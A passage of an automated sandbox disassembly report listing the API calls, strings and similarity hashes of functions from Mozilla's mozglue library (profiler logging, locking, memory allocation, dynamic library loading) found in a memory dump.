                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC2F02E
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?), ref: 6CC2F041
                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC2F065
                                                                                                                            • moz_xmalloc.MOZGLUE ref: 6CC2F072
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1148890222-0
                                                                                                                            • Opcode ID: 236eea606a582332af99d1810e0da0c1977e0a494536a1515c995c6e4ed16284
                                                                                                                            • Instruction ID: 4625899b155b74c41396911673770e06930dc5bf2a81ffd3a460d60933dda902
                                                                                                                            • Opcode Fuzzy Hash: 236eea606a582332af99d1810e0da0c1977e0a494536a1515c995c6e4ed16284
                                                                                                                            • Instruction Fuzzy Hash: ED41D3B1A002159FCB18CF78D8809AE7769BF88324B24422CE816DB794FB35E915C7E1
                                                                                                                            APIs
                                                                                                                            • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CC9B5B9
                                                                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CC9B5C5
                                                                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CC9B5DA
                                                                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CC9B5F4
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC9B605
                                                                                                                            • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CC9B61F
                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6CC9B631
                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC9B655
                                                                                                                            Similarity
                                                                                                                            • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1276798925-0
                                                                                                                            • Opcode ID: 49762c248d6fcd34e4a524b980fe90e4b0d4820f40d15dacc4e64cad58225feb
                                                                                                                            • Instruction ID: 4b80641bb95262ec48581c118c3ad388a9aa36297fb78061463c717715bfba75
                                                                                                                            • Opcode Fuzzy Hash: 49762c248d6fcd34e4a524b980fe90e4b0d4820f40d15dacc4e64cad58225feb
                                                                                                                            • Instruction Fuzzy Hash: F531A171F001058FCB10DFE9D8AC9AEBBB5FF8A325B140599D902A7740EB70A816CB91
                                                                                                                            APIs
                                                                                                                            • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC7CC83,?,?,?,?,?,?,?,?,?,6CC7BCAE,?,?,6CC6DC2C), ref: 6CC3B7E6
                                                                                                                            • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC7CC83,?,?,?,?,?,?,?,?,?,6CC7BCAE,?,?,6CC6DC2C), ref: 6CC3B80C
                                                                                                                            • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6CC7CC83,?,?,?,?,?,?,?,?,?,6CC7BCAE), ref: 6CC3B88E
                                                                                                                            • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6CC7CC83,?,?,?,?,?,?,?,?,?,6CC7BCAE,?,?,6CC6DC2C), ref: 6CC3B896
                                                                                                                            Similarity
                                                                                                                            • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 922945588-0
                                                                                                                            • Opcode ID: 484e8398fe78e8292fabcf26363e36a49b11b3c280cd226265d9fc8e31e9e142
                                                                                                                            • Instruction ID: 43ed776ab3d3f9dbc4f9e6190ea76bd63c289ba6389851acea2609898ac77db0
                                                                                                                            • Opcode Fuzzy Hash: 484e8398fe78e8292fabcf26363e36a49b11b3c280cd226265d9fc8e31e9e142
                                                                                                                            • Instruction Fuzzy Hash: FD51BE35B00A148FCB15CF59D4A8A6ABBF5FF89318B69855DE98A87341D730EC01CB80
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC71D0F
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,6CC71BE3,?,?,6CC71D96,00000000), ref: 6CC71D18
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,6CC71BE3,?,?,6CC71D96,00000000), ref: 6CC71D4C
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC71DB7
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC71DC0
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC71DDA
                                                                                                                              • Part of subcall function 6CC71EF0: GetCurrentThreadId.KERNEL32 ref: 6CC71F03
                                                                                                                              • Part of subcall function 6CC71EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CC71DF2,00000000,00000000), ref: 6CC71F0C
                                                                                                                              • Part of subcall function 6CC71EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC71F20
                                                                                                                            • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CC71DF4
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1880959753-0
                                                                                                                            • Opcode ID: 87c1706239cb984c314091128de0819c5563eec95594a821748cfc716a3d073e
                                                                                                                            • Instruction ID: adf148efa4bd832830582d96ea0689c4788710a03ecbdb31d7dab46f2fa54c3a
                                                                                                                            • Opcode Fuzzy Hash: 87c1706239cb984c314091128de0819c5563eec95594a821748cfc716a3d073e
                                                                                                                            • Instruction Fuzzy Hash: C141ABB56007049FCB20CF69D598A5ABBF9FF49314F10446DE99A87B41DB31F854CBA0
                                                                                                                            APIs
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC684F3
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC6850A
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC6851E
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC6855B
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC6856F
                                                                                                                            • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC685AC
                                                                                                                              • Part of subcall function 6CC67670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC685B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC6767F
                                                                                                                              • Part of subcall function 6CC67670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC685B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC67693
                                                                                                                              • Part of subcall function 6CC67670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC685B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC676A7
                                                                                                                            • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC685B2
                                                                                                                              • Part of subcall function 6CC45E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC45EDB
                                                                                                                              • Part of subcall function 6CC45E90: memset.VCRUNTIME140(6CC87765,000000E5,55CCCCCC), ref: 6CC45F27
                                                                                                                              • Part of subcall function 6CC45E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC45FB2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2666944752-0
                                                                                                                            APIs
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC31699
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC316CB
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC316D7
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC316DE
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC316E5
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC316EC
                                                                                                                            • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC316F9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 375572348-0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC5CBE8: GetCurrentProcess.KERNEL32(?,6CC231A7), ref: 6CC5CBF1
                                                                                                                              • Part of subcall function 6CC5CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC231A7), ref: 6CC5CBFA
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F619
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC6F598), ref: 6CC6F621
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F637
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8,?,?,00000000,?,6CC6F598), ref: 6CC6F645
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8,?,?,00000000,?,6CC6F598), ref: 6CC6F663
                                                                                                                            Strings
                                                                                                                            • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC6F62A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                            • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                            • API String ID: 1579816589-753366533
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6CC31FDE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6CC31FFD
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC32011
                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CC32059
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                            • String ID: CoCreateInstance$combase.dll
                                                                                                                            • API String ID: 4190559335-2197658831
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CC5D9F0,00000000), ref: 6CC30F1D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CC30F3C
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC30F50
                                                                                                                            • FreeLibrary.KERNEL32(?,6CC5D9F0,00000000), ref: 6CC30F86
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                            • String ID: CoInitializeEx$combase.dll
                                                                                                                            • API String ID: 4190559335-2063391169
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F559
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6F561
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F577
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6F585
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6F5A3
                                                                                                                            Strings
                                                                                                                            • [I %d/%d] profiler_resume, xrefs: 6CC6F239
                                                                                                                            • [I %d/%d] profiler_resume_sampling, xrefs: 6CC6F499
                                                                                                                            • [I %d/%d] profiler_pause_sampling, xrefs: 6CC6F3A8
                                                                                                                            • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CC6F56A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                            • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                            • API String ID: 2848912005-2840072211
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll,6CC30DF8), ref: 6CC30E82
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6CC30EA1
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC30EB5
                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CC30EC5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                            • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                            • API String ID: 391052410-1680159014
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F619
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC6F598), ref: 6CC6F621
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F637
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8,?,?,00000000,?,6CC6F598), ref: 6CC6F645
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8,?,?,00000000,?,6CC6F598), ref: 6CC6F663
                                                                                                                            Strings
                                                                                                                            • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC6F62A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                            • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                            • API String ID: 2848912005-753366533
                                                                                                                            APIs
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CC5CFAE,?,?,?,6CC231A7), ref: 6CC605FB
                                                                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CC5CFAE,?,?,?,6CC231A7), ref: 6CC60616
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CC231A7), ref: 6CC6061C
                                                                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CC231A7), ref: 6CC60627
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _writestrlen
                                                                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                            • API String ID: 2723441310-2186867486
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC814C5
                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC814E2
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC81546
                                                                                                                            • InitializeConditionVariable.KERNEL32(?), ref: 6CC815BA
                                                                                                                            • free.MOZGLUE(?), ref: 6CC816B4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1909280232-0
                                                                                                                            APIs
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC79FDB
                                                                                                                            • free.MOZGLUE(?,?), ref: 6CC79FF0
                                                                                                                            • free.MOZGLUE(?,?), ref: 6CC7A006
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC7A0BE
                                                                                                                            • free.MOZGLUE(?,?), ref: 6CC7A0D5
                                                                                                                            • free.MOZGLUE(?,?), ref: 6CC7A0EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
